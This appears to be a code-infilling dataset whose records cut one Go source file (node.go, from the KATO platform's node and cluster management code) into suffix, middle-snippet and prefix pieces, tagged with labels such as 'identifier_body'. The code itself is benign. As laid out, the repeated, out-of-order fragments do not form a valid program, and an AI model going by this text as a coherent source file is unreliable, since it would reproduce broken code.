CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok {
labels[k] = v
}
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error |
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
} | identifier_body |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus
type NodeStatus struct {
//worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
ContainerRuntimeVersion: status.NodeInfo.ContainerRuntimeVersion,
Architecture: status.NodeInfo.Architecture,
}
}
// MergeLabels merges custom lables into labels.
func (n *HostNode) MergeLabels() map[string]string {
// TODO: Parallel
labels := make(map[string]string, len(n.Labels)+len(n.CustomLabels))
// copy labels
for k, v := range n.Labels {
labels[k] = v
}
for k, v := range n.CustomLabels {
if _, ok := n.Labels[k]; !ok |
}
return labels
}
// NodeSystemInfo is a set of ids/uuids to uniquely identify the node.
type NodeSystemInfo struct {
// MachineID reported by the node. For unique machine identification
// in the cluster this field is preferred. Learn more from man(5)
// machine-id: http://man7.org/linux/man-pages/man5/machine-id.5.html
MachineID string `json:"machineID"`
// SystemUUID reported by the node. For unique machine identification
// MachineID is preferred. This field is specific to Red Hat hosts
// https://access.redhat.com/documentation/en-US/Red_Hat_Subscription_Management/1/html/RHSM/getting-system-uuid.html
SystemUUID string `json:"systemUUID"`
// Boot ID reported by the node.
BootID string `json:"bootID" protobuf:"bytes,3,opt,name=bootID"`
// Kernel Version reported by the node from 'uname -r' (e.g. 3.16.0-0.bpo.4-amd64).
KernelVersion string `json:"kernelVersion" `
// OS Image reported by the node from /etc/os-release (e.g. Debian GNU/Linux 7 (wheezy)).
OSImage string `json:"osImage"`
// ContainerRuntime Version reported by the node through runtime remote API (e.g. docker://1.5.0).
ContainerRuntimeVersion string `json:"containerRuntimeVersion"`
// The Operating System reported by the node
OperatingSystem string `json:"operatingSystem"`
// The Architecture reported by the node
Architecture string `json:"architecture"`
MemorySize uint64 `json:"memorySize"`
NumCPU int64 `json:"cpu_num"`
}
const (
//Running node running status
Running = "running"
//Offline node offline status
Offline = "offline"
//Unknown node unknown status
Unknown = "unknown"
//Error node error status
Error = "error"
//Init node init status
Init = "init"
//InstallSuccess node install success status
InstallSuccess = "install_success"
//InstallFailed node install failure status
InstallFailed = "install_failed"
//Installing node installing status
Installing = "installing"
//NotInstalled node not install status
NotInstalled = "not_installed"
)
//Decode - decode node info
func (n *HostNode) Decode(data []byte) error {
if err := ffjson.Unmarshal(data, n); err != nil {
logrus.Error("decode node info error:", err.Error())
return err
}
return nil
}
//NodeList
type NodeList []*HostNode
func (list NodeList) Len() int {
return len(list)
}
func (list NodeList) Less(i, j int) bool {
return list[i].InternalIP < list[j].InternalIP
}
func (list NodeList) Swap(i, j int) {
var temp = list[i]
list[i] = list[j]
list[j] = temp
}
//GetNodeFromKV - parse node information from etcd
func GetNodeFromKV(kv *mvccpb.KeyValue) *HostNode {
var node HostNode
if err := ffjson.Unmarshal(kv.Value, &node); err != nil {
logrus.Error("parse node info error:", err.Error())
return nil
}
return &node
}
//UpdataK8sCondition - update the status of the k8s node to the kato node
func (n *HostNode) UpdataK8sCondition(conditions []v1.NodeCondition) {
for _, con := range conditions {
var rbcon NodeCondition
if NodeConditionType(con.Type) == "Ready" {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionStatus(con.Status),
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
} else {
if con.Status != v1.ConditionFalse {
rbcon = NodeCondition{
Type: KubeNodeReady,
Status: ConditionFalse,
LastHeartbeatTime: con.LastHeartbeatTime.Time,
LastTransitionTime: con.LastTransitionTime.Time,
Reason: con.Reason,
Message: con.Message,
}
}
}
n.UpdataCondition(rbcon)
}
}
//DeleteCondition
func (n *HostNode) DeleteCondition(types ...NodeConditionType) {
for _, t := range types {
for i, c := range n.NodeStatus.Conditions {
if c.Type.Compare(t) {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions[:i], n.NodeStatus.Conditions[i+1:]...)
break
}
}
}
}
// UpdateReadyStatus
func (n *HostNode) UpdateReadyStatus() {
var status = ConditionTrue
var Reason, Message string
for _, con := range n.NodeStatus.Conditions {
if con.Status != ConditionTrue && con.Type != "" && con.Type != NodeReady {
logrus.Debugf("because %s id false, will set node %s(%s) health is false", con.Type, n.ID, n.InternalIP)
status = ConditionFalse
Reason = con.Reason
Message = con.Message
break
}
}
n.GetAndUpdateCondition(NodeReady, status, Reason, Message)
}
//GetCondition
func (n *HostNode) GetCondition(ctype NodeConditionType) *NodeCondition {
for _, con := range n.NodeStatus.Conditions {
if con.Type.Compare(ctype) {
return &con
}
}
return nil
}
// GetAndUpdateCondition get old condition and update it, if old condition is nil and then create it
func (n *HostNode) GetAndUpdateCondition(condType NodeConditionType, status ConditionStatus, reason, message string) {
oldCond := n.GetCondition(condType)
now := time.Now()
var lastTransitionTime time.Time
if oldCond == nil {
lastTransitionTime = now
} else {
if oldCond.Status != status {
lastTransitionTime = now
} else {
lastTransitionTime = oldCond.LastTransitionTime
}
}
cond := NodeCondition{
Type: condType,
Status: status,
LastHeartbeatTime: now,
LastTransitionTime: lastTransitionTime,
Reason: reason,
Message: message,
}
n.UpdataCondition(cond)
}
//UpdataCondition
func (n *HostNode) UpdataCondition(conditions ...NodeCondition) {
for _, newcon := range conditions {
if newcon.Type == "" {
continue
}
var update bool
if n.NodeStatus.Conditions != nil {
for i, con := range n.NodeStatus.Conditions {
if con.Type.Compare(newcon.Type) {
n.NodeStatus.Conditions[i] = newcon
update = true
break
}
}
}
if !update {
n.NodeStatus.Conditions = append(n.NodeStatus.Conditions, newcon)
}
}
}
//HostRule
type HostRule []string
//SupportNodeRule
var SupportNodeRule = []string{ComputeNode, ManageNode, StorageNode, GatewayNode}
//ComputeNode
var ComputeNode = "compute"
//ManageNode
var ManageNode = "manage"
//StorageNode
var StorageNode = "storage"
//GatewayNode
var GatewayNode = "gateway"
//HasRule
func (h HostRule) HasRule(rule string) bool {
for _, v := range h {
if v == rule {
return true
}
}
return false
}
func (h HostRule) String() string {
return strings.Join(h, ",")
}
//Add role
func (h *HostRule) Add(role ...string) {
for _, r := range role {
if !util.StringArrayContains(*h, r) {
*h = append(*h, r)
}
}
}
//Validation - host rule validation
func (h HostRule) Validation() error {
if len(h) == 0 {
return fmt.Errorf("node rule cannot be enpty")
}
for _, role := range h {
if !util.StringArrayContains(SupportNodeRule, role) {
return fmt.Errorf("node role %s can not be supported", role)
}
}
return nil
}
//NodeConditionType
type NodeConditionType string
// These are valid conditions of node.
const (
// NodeReady means this node is working
NodeReady NodeConditionType = "Ready"
KubeNodeReady NodeConditionType = "KubeNodeReady"
NodeUp NodeConditionType = "NodeUp"
// InstallNotReady means the installation task was not completed in this node.
InstallNotReady NodeConditionType = "InstallNotReady"
OutOfDisk NodeConditionType = "OutOfDisk"
MemoryPressure NodeConditionType = "MemoryPressure"
DiskPressure NodeConditionType = "DiskPressure"
PIDPressure NodeConditionType = "PIDPressure"
)
var masterCondition = []NodeConditionType{NodeReady, KubeNodeReady, NodeUp, InstallNotReady, OutOfDisk, MemoryPressure, DiskPressure, PIDPressure}
//IsMasterCondition Whether it is a preset condition of the system
func IsMasterCondition(con NodeConditionType) bool {
for _, c := range masterCondition {
if c.Compare(con) {
return true
}
}
return false
}
//Compare
func (nt NodeConditionType) Compare(ent NodeConditionType) bool {
return string(nt) == string(ent)
}
//ConditionStatus
type ConditionStatus string
// These are valid condition statuses. "ConditionTrue" means a resource is in the condition.
// "ConditionFalse" means a resource is not in the condition. "ConditionUnknown" means kubernetes
// can't decide if a resource is in the condition or not. In the future, we could add other
// intermediate conditions, e.g. ConditionDegraded.
const (
ConditionTrue ConditionStatus = "True"
ConditionFalse ConditionStatus = "False"
ConditionUnknown ConditionStatus = "Unknown"
)
// NodeCondition contains condition information for a node.
type NodeCondition struct {
// Type of node condition.
Type NodeConditionType `json:"type" `
// Status of the condition, one of True, False, Unknown.
Status ConditionStatus `json:"status" `
// Last time we got an update on a given condition.
// +optional
LastHeartbeatTime time.Time `json:"lastHeartbeatTime,omitempty" `
// Last time the condition transit from one status to another.
// +optional
LastTransitionTime time.Time `json:"lastTransitionTime,omitempty" `
// (brief) reason for the condition's last transition.
// +optional
Reason string `json:"reason,omitempty"`
// Human readable message indicating details about last transition.
// +optional
Message string `json:"message,omitempty"`
}
//String
func (n *HostNode) String() string {
res, _ := ffjson.Marshal(n)
return string(res)
}
//Update node info
func (n *HostNode) Update() (*client.PutResponse, error) {
savenode := *n
savenode.NodeStatus.KubeNode = nil
return store.DefalutClient.Put(conf.Config.NodePath+"/"+n.ID, savenode.String())
}
//DeleteNode
func (n *HostNode) DeleteNode() (*client.DeleteResponse, error) {
return store.DefalutClient.Delete(conf.Config.NodePath + "/" + n.ID)
}
//DelEndpoints
func (n *HostNode) DelEndpoints() {
keys, err := n.listEndpointKeys()
if err != nil {
logrus.Warningf("error deleting endpoints: %v", err)
return
}
for _, key := range keys {
_, err := store.DefalutClient.Delete(key)
if err != nil {
logrus.Warnf("key: %s; error delete endpoints: %v", key, err)
}
}
}
func (n *HostNode) listEndpointKeys() ([]string, error) {
resp, err := store.DefalutClient.Get(KatoEndpointPrefix, client.WithPrefix())
if err != nil {
return nil, fmt.Errorf("prefix: %s; error list kato endpoint keys by prefix: %v", KatoEndpointPrefix, err)
}
var res []string
for _, kv := range resp.Kvs {
key := string(kv.Key)
if strings.Contains(key, n.InternalIP) {
res = append(res, key)
}
}
return res, nil
}
| {
labels[k] = v
} | conditional_block |
node.go | // KATO, Application Management Platform
// Copyright (C) 2021 Gridworkz Co., Ltd.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this
// software and associated documentation files (the "Software"), to deal in the Software
// without restriction, including without limitation the rights to use, copy, modify, merge,
// publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons
// to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or
// substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
// INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
// PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
// FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
// ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
package client
import (
"fmt"
"strings"
"time"
client "github.com/coreos/etcd/clientv3"
"github.com/coreos/etcd/mvcc/mvccpb"
conf "github.com/gridworkz/kato/cmd/node/option"
"github.com/gridworkz/kato/node/core/store"
"github.com/gridworkz/kato/util"
"github.com/pquerna/ffjson/ffjson"
"github.com/sirupsen/logrus"
v1 "k8s.io/api/core/v1"
)
//LabelOS - node label about os
var LabelOS = "beta.kubernetes.io/os"
var LabelGPU = "beta.kato.com/gpushare"
//APIHostNode
type APIHostNode struct {
ID string `json:"uuid" validate:"uuid"`
HostName string `json:"host_name" validate:"host_name"`
InternalIP string `json:"internal_ip" validate:"internal_ip|ip"`
ExternalIP string `json:"external_ip" validate:"external_ip|ip"`
RootPass string `json:"root_pass,omitempty"`
Privatekey string `json:"private_key,omitempty"`
Role HostRule `json:"role" validate:"role|required"`
PodCIDR string `json:"podCIDR"`
AutoInstall bool `json:"auto_install"`
Labels map[string]string `json:"labels"`
}
//Clone
func (a APIHostNode) Clone() *HostNode {
hn := &HostNode{
ID: a.ID,
HostName: a.HostName,
InternalIP: a.InternalIP,
ExternalIP: a.ExternalIP,
RootPass: a.RootPass,
KeyPath: a.Privatekey,
Role: a.Role,
Labels: map[string]string{"kato_node_hostname": a.HostName},
CustomLabels: map[string]string{},
NodeStatus: NodeStatus{Status: "not_installed", Conditions: make([]NodeCondition, 0)},
Status: "not_installed",
PodCIDR: a.PodCIDR,
//node default unscheduler
Unschedulable: true,
}
return hn
}
//HostNode - kato node entity
type HostNode struct {
ID string `json:"uuid"`
HostName string `json:"host_name"`
CreateTime time.Time `json:"create_time"`
InternalIP string `json:"internal_ip"`
ExternalIP string `json:"external_ip"`
RootPass string `json:"root_pass,omitempty"`
KeyPath string `json:"key_path,omitempty"` //Management node key file path
AvailableMemory int64 `json:"available_memory"`
AvailableCPU int64 `json:"available_cpu"`
Mode string `json:"mode"`
Role HostRule `json:"role"` //compute, manage, storage, gateway
Status string `json:"status"`
Labels map[string]string `json:"labels"` // system labels
CustomLabels map[string]string `json:"custom_labels"` // custom labels
Unschedulable bool `json:"unschedulable"` // Settings
PodCIDR string `json:"podCIDR"`
NodeStatus NodeStatus `json:"node_status"`
}
//Resource
type Resource struct {
CPU int `json:"cpu"`
MemR int `json:"mem"`
}
// NodePodResource -
type NodePodResource struct {
AllocatedResources `json:"allocatedresources"`
Resource `json:"allocatable"`
}
// AllocatedResources -
type AllocatedResources struct {
CPURequests int64
CPULimits int64
MemoryRequests int64
MemoryLimits int64
MemoryRequestsR string
MemoryLimitsR string
CPURequestsR string
CPULimitsR string
}
//NodeStatus | //worker maintenance
Version string `json:"version"`
//worker maintenance example: unscheduler, offline
//Initiate a recommendation operation to the master based on the node state
AdviceAction []string `json:"advice_actions"`
//worker maintenance
Status string `json:"status"` //installed running offline unknown
//master maintenance
CurrentScheduleStatus bool `json:"current_scheduler"`
//master maintenance
NodeHealth bool `json:"node_health"`
//worker maintenance
NodeUpdateTime time.Time `json:"node_update_time"`
//master maintenance
KubeUpdateTime time.Time `json:"kube_update_time"`
//worker maintenance node progress down time
LastDownTime time.Time `json:"down_time"`
//worker and master maintenance
Conditions []NodeCondition `json:"conditions,omitempty"`
//master maintenance
KubeNode *v1.Node
//worker and master maintenance
NodeInfo NodeSystemInfo `json:"nodeInfo,omitempty" protobuf:"bytes,7,opt,name=nodeInfo"`
}
//UpdateK8sNodeStatus update kato node status by k8s node
func (n *HostNode) UpdateK8sNodeStatus(k8sNode v1.Node) {
status := k8sNode.Status
n.UpdataK8sCondition(status.Conditions)
n.NodeStatus.NodeInfo = NodeSystemInfo{
MachineID: status.NodeInfo.MachineID,
SystemUUID: status.NodeInfo.SystemUUID,
BootID: status.NodeInfo.BootID,
KernelVersion: status.NodeInfo.KernelVersion,
OSImage: status.NodeInfo.OSImage,
OperatingSystem: status.NodeInfo.OperatingSystem,
